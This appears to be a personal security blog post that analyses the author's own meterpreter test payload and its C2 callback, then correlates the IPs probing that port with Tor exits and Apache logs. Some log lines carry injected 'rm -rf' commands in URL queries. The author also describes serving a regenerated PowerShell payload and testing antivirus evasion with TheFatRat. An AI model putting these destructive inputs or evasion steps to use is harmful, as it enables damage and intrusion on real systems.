2065:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ

; Got new binary / 2nd stage
binwalk -e resumepcap.hexdump
file _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
md5sum _resumepcap.hexdump.extracted/4
eeb70c0bd145011062f0116738e10a5e  _resumepcap.hexdump.extracted/4
; lazy again:
cp _resumepcap.hexdump.extracted/4 ./4.exe
https://www.virustotal.com/#/file/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f/detection
https://www.hybrid-analysis.com/sample/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f?environmentId=120

; Total IOCs
(myserver):9008
9A8FE886ABA12E02FD0FC44F004A7111

rahash2 -a all _resumepcap.hexdump.extracted/4 |awk '{print $3,$4}'

rahash2 -a all resume1.doc.exe |awk '{print $3,$4}'

rahash2 -a all resumebase64.decoded |awk '{print $3,$4}'

The gist of all that is that it connected back to port 9008 on my server, where I have an active meterpreter listener forwarded to. Pretty easy, not really a difficult analysis, really a 5 minute rush job. But it does help me know that meterpreter launches that secondary payload when run, and that's pretty sweet, though everyone sort of knew that. But since launching this and a few other things online, I've received a number of hits on my shell from people looking at that port:

185.220.101.6
163.172.214.8
37.59.20.111
107.178.194.23
52.200.221.20
14.141.107.206
66.249.88.132
208.87.233.140
185.220.101.13
161.69.99.11
5.62.59.93
1.192.194.17
134.96.238.193
50.112.194.65
As of the time of this writing:
curl "https://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv" 2>/dev/null|grep "185.220.101.6\|163.172.214.8\|37.59.20.111\|107.178.194.23\|52.200.221.20\|50.112.194.65\|14.141.107.206\|66.249.88.132\|208.87.233.140\|185.220.101.13\|161.69.99.11\|5.62.59.93\|1.192.194.17\|134.96.238.193\|50.112.194.65"
163.172.214.8
185.220.101.6
185.220.101.13

This last one is sort of amusing because it tells me they looked a little bit into my site:

/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

Edit: I wanted to add more, because the comparison between the IPs connecting to my C2 port for my test malware and the hosts connecting to my web server amuses me, not including Tor nodes:

grep -i "37.59.20.111\|107.178.194.23\|52.200.221.20\|14.141.107.206\|66.249.88.132\|208.87.233.140\|161.69.99.11\|5.62.59.93\|1.192.194.171\|34.96.238.193\|50.112.194.65" /var/log/apache2/access.log*
/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html?lol&rm%20-rf%20/boot/&rm%20-rf%20/opt/&rm%20-rf%20~/& HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:57 -0600] "GET /coinhive.min.js HTTP/1.1" 200 18805 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:32:39 -0600] "GET / HTTP/1.1" 200 8440260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"
/var/log/apache2/access.log.8:52.200.221.20 - - [05/Mar/2018:10:35:21 -0600] "GET / HTTP/1.1" 200 157832 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
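The same correlation the curl/grep commands above do by hand, written up as an added Python example (not the author's tooling). It runs over constructed sample data modelled on the post: a few of the C2-port hitters, a snippet standing in for the Tor exit list, and Apache combined-format log lines like those above, including the AppEngine "virustotalcloud" User-Agent the logs show. The function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample data modelled on the post (not the real scan data):
# hosts that hit the C2 port, a stand-in for the Tor exit list, and Apache
# combined-format access log lines like the ones grep'd above.
C2_HITTERS = ["185.220.101.6", "50.112.194.65", "52.200.221.20", "107.178.194.23"]
TOR_EXITS = {"185.220.101.6", "185.220.101.13", "163.172.214.8"}
ACCESS_LOG = """\
50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 (Windows; U; MSIE 9.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"
52.200.221.20 - - [05/Mar/2018:10:35:21 -0600] "GET / HTTP/1.1" 200 157832 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
"""

# Apache combined log format; the request field is matched up to the closing
# quote, so odd requests (spaces, no HTTP version, 400 responses) still parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_access_log(text):
    """Group parsed log records by client IP; lines that don't parse are skipped."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits[m["ip"]].append(m.groupdict())
    return hits


def classify(c2_hitters, tor_exits, web_hits):
    """For each host that hit the C2 port: is it a Tor exit, which web requests
    it made, and did any of them carry the AppEngine/virustotalcloud UA."""
    report = {}
    for ip in c2_hitters:
        recs = web_hits.get(ip, [])
        report[ip] = {
            "tor_exit": ip in tor_exits,
            "web_requests": [r["req"] for r in recs],
            "sandbox_ua": any("virustotalcloud" in r["ua"] for r in recs),
        }
    return report


if __name__ == "__main__":
    result = classify(C2_HITTERS, TOR_EXITS, parse_access_log(ACCESS_LOG))
    for ip, info in result.items():
        print(ip, info)
```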


These are both things that have been scanned with VirusTotal or other platforms for shits and giggles, but this draws a clear understanding that some do, and some don't, use Tor with their analysis.

But what are people trying to analyze? Well, the miner one, with that particular notion at the end, was one provided in another post on this blog, plus my own GET data added to it. This was specific to a URL attempt put into VirusTotal because I want to track who's tracking this. The diagfix one is unrelated, but is a repeatedly regenerated (every 300 seconds) Unicorn PowerShell payload. I did this for ease of use and for testing the "FUD" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. YARA rules could easily determine it, or the exec form. You'll see in my above example I left out the meterpreter YARA rules; this is because, well, it's analysis without the answer provided to me.

Things I learned with this week of dickery:

  • People seem to be rummaging through and analyzing things they happen across, or that were involved in something flagged by the APT detection BS.
  • Apparently people detect meterpreter data as part of Poison Ivy.
    • Looked further, neat: the copy of Poison Ivy I have does partially contain code from meterpreter's stdapi nonsense it sends down.
  • TheFatRat as a wrapper is pretty nice, but it can be skipped in favor of running the power.py and pw_exec.py tools on your own, such as in a cron/at/while loop.
  • Automated tools used when analyzing things often show weaker precautions than those meant to provide the reports.
  • A $5 cloud or Docker instance, for a few hours of playing, with just a minimal amount of preparation beforehand, builds a full-purpose suite for rapid spin up, attack, and spin down.
    • Better yet, cloud services providing per-hour pay, awww yeah... just don't assume they actually destroy things when it seems they did; go ahead and zero-fill everything that you don't want shared before you deprovision.

-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour
